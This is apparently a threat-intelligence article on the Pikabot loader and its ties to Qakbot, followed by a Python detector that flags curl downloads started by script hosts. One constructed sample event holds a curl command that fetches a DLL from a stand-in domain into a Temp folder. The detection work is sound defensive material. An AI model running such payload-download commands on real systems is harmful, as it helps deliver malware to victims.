Law enforcement operations can have a severe and abrupt impact on the threat landscape, putting pressure on threat actors to expand and adapt their toolsets to minimize business interruption. Operation Duck Hunt in 2023, which knocked the extremely prolific loader malware family Qakbot off its throne, is one such change. Shifts of this kind tend to attract the attention of certain threat intelligence analysts; and so, given Qakbot’s popularity and its subsequent downfall, those analysts at NCC Group became interested in proactively monitoring for increases in the usage of similar loaders. If Qakbot’s departure from the playing field left a vacuum, which competitor would rise to the challenge now that the tool’s infrastructure had been seized? And so, while law enforcement silently toiled to disrupt, we silently turned to digging.

Loader malware is a pivotal, expensive, and powerful entry vector that secures its place in the victim’s systems. Loaders serve a wide range of other malware operators (including other loaders), making sure that the initial stages of a crime run smoothly, which makes them high-priority investigation targets. After all, from the defender’s perspective, one would much rather close off the entry points for malicious activity as early as possible than deal with the fallout within the core systems.

Our research started preemptively with a close investigation of the Pikabot loader, a trojan that emerged in May 2023 and was deemed a likely match for Qakbot. The new addition to the loader market exhibited multiple resemblances to Qakbot from the beginning of its career, including the eerily similar way both loaders were spread during their respective campaigns by what the security research community believes to be one specific affiliate.
This annual Spotlight would like to take you on a fly-by through our investigation of the loader landscape, step by step: starting with getting cozy with our new malware friend Pikabot, continuing to the tall-grass hunt for more specimens like it, and ending with the woes of collecting malware data from the Wild Wide Web.
Pikabot overview
Before embarking on looking for traces of Qakbot’s competitor activity, we had to get up close and friendly with our potential targets in order to understand how they tick and how to go about looking for more. Pikabot is a new loader-type malware that emerged in early 2023. In its early stages, the loader’s purpose was fetching additional malware. Like Qakbot, the loader consists of three main modular components. The loader component drops secondary payloads on infected systems and downloads the malicious DLL. The code injector decrypts and injects the core module. Finally, the core module is responsible for communicating with the C2 servers, retrieving and injecting malicious payloads from the C2, executing remote commands, and performing code injection. In recent campaigns Cobalt Strike has been used to facilitate the further compromise of the infected system and network. Pikabot shares similarities with Qakbot in its distribution methods, campaigns, and malware behavior. E-mail thread hijacking is used to lure the target into interacting with a password-protected ZIP file. When this happens, curl is used to download Pikabot, which then collects some basic information such as the current user and the system’s network details.
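The delivery step above (curl fetching the loader after the user opens the ZIP) is something a defender can look for in endpoint telemetry. The following is an added example, not code from the NCC Group report or from Pikabot itself: a small detector over constructed Sysmon-style process-creation events that flags curl.exe writing a download to disk when its parent is a script or shell host. The set of parent process names and the shape of the sample events are assumptions made for the example; the page does not state how curl is invoked.

```python
# Added example (not from the report): flag the "script host spawns curl to fetch a
# payload" shape over constructed process-creation events (Sysmon Event ID 1 style).
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line of the created process


# Assumption for the example: curl launched from a script/shell host on a user workstation
# is the suspicious shape; curl typed into a developer terminal is not.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe", "powershell.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# curl only writes the body to a file with -o/--output/-O; a bare GET without these
# is a fetch to stdout and is treated as benign here.
OUTPUT_FLAG_RE = re.compile(r"(?:^|\s)(?:-o|--output|-O)(?:\s|$)")


def basename(path: str) -> str:
    """Last path component, lower-cased, for both \\ and / separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_suspicious_curl(ev: ProcEvent):
    """Return a reason string if the event matches the curl-download pattern, else None."""
    if basename(ev.image) != "curl.exe":
        return None
    url = URL_RE.search(ev.command_line)
    if url is None:
        return None
    parent = basename(ev.parent_image)
    writes_file = OUTPUT_FLAG_RE.search(ev.command_line) is not None
    if parent in SCRIPT_HOSTS and writes_file:
        return f"curl spawned by {parent} downloading {url.group(0)} to disk"
    return None


def scan(events):
    """Return (index, reason) pairs for every event that matched."""
    return [(i, r) for i, ev in enumerate(events) if (r := is_suspicious_curl(ev))]


# Constructed sample events (not real telemetry); example.invalid is a reserved test domain.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\curl.exe",
              r"curl.exe http://example.invalid/update.dll -o C:\Users\alice\AppData\Local\Temp\a.dll"),
    ProcEvent(r"C:\Program Files\Git\git-bash.exe", r"C:\Windows\System32\curl.exe",
              "curl https://example.invalid/api/health"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for idx, reason in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}")
```

In a real deployment the parent-process allow-list and the output-path check would be tuned against the environment's own baseline of legitimate curl usage.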